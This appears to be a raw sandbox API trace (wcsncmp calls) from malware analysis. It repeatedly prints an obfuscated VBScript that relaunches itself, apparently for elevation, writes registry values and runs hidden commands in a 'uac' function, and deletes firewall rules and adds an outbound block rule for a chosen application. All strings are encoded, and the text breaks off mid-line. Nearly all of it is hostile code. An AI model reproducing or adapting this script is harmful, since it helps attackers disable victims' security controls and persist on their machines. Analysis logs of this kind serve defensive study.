Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -4 [0226.314] wcsncmp (_String1="wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106 [0226.314] wcsncmp (_String1="end \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.314] wcsncmp (_String1="nd \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.315] wcsncmp (_String1="d \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0226.315] wcsncmp (_String1=" \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = 